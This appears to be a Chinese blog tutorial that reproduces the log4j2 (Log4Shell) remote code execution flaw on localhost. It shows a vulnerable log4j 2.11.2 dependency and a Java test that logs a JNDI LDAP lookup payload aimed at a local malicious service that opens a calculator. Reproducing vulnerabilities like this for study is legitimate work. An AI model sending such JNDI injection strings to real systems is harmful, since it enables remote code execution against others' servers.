栏目分类:
子分类:
返回
名师互学网用户登录
快速导航关闭
当前搜索
当前分类
子分类
实用工具
热门搜索
名师互学网 > IT > 软件开发 > 后端开发 > Java

log4j2远程代码执行漏洞复现

Java 更新时间: 发布时间: IT归档 最新发布 模块sitemap 名妆网 法律咨询 聚返吧 英语巴士网 伯小乐 网商动力

log4j2远程代码执行漏洞复现

从漏洞曝出,因为从来就没有了解过jndi,所以花了有一天时间才搞出。
以下是简单教程。

1.pom.xml

    
        
            org.apache.logging.log4j
            log4j-core
            2.11.2
        

        
        
            org.apache.logging.log4j
            log4j-api
            2.11.2
        
  
2.log4j2.xml


    
        
            
        
    
    
        
            
        
    

3.在127.0.0.1:9527先架设个恶意服务,该服务里面的代码是弹出计算器。 4.做个测试
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class LogTest {
	public static Logger log = LogManager.getLogger(LogTest.class);
	
	public static void main(String[] args) {
		log.info("${jndi:ldap://127.0.0.1:9527/Muma}");
	}
}
5.看下效果

6.最为关键的,怎么架设?

看我另外一篇博客:
JNDI注入demo使用ldap方式

7.其他
  • 注意log4j2漏洞不止ldap,对于rmi同样有效
  • 漏洞比较猛
参考
  • JNDI学习总结(一):JNDI到底是什么?
  • 浅谈JNDI
  • 初识JNDI
  • [web安全]Apache Log4j2远程代码执行漏洞
  • LDAP入门
  • 服务器搭建八——LDAP目录服务器
  • 如何安装配置Active Directory
  • LDAP基础:AD:运行在容器中的Active Directory服务
  • 漏洞复现丨快速开启RMI&&LDAP
  • Apache Log4j2远程代码执行漏洞复现
转载请注明:文章转载自 www.mshxw.com
本文地址:https://www.mshxw.com/it/657453.html
我们一直用心在做
关于我们 文章归档 网站地图 联系我们

版权所有 (c)2021-2022 MSHXW.COM

ICP备案号:晋ICP备2021003244-6号